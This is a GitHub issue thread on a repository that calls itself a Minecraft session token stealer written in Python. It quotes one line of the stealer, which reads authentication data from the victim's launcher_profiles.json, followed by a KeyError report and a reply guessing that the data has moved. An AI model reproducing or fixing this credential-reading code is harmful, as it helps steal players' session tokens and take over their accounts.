wodxgod / Minecraft-Session-Token-Stealer

A Minecraft session token stealer written in Python 3
96 stars 123 forks source link

KeyError: 'authenticationDatabase' #20

Open rikuru-to865 opened 2 years ago

rikuru-to865 commented 2 years ago

auth_db = json.loads(open(os.getenv("APPDATA") + "\.minecraft\launcher_profiles.json").read())["authenticationDatabase"] KeyError: 'authenticationDatabase'

littlepig453 commented 2 years ago

they might have moved the auth database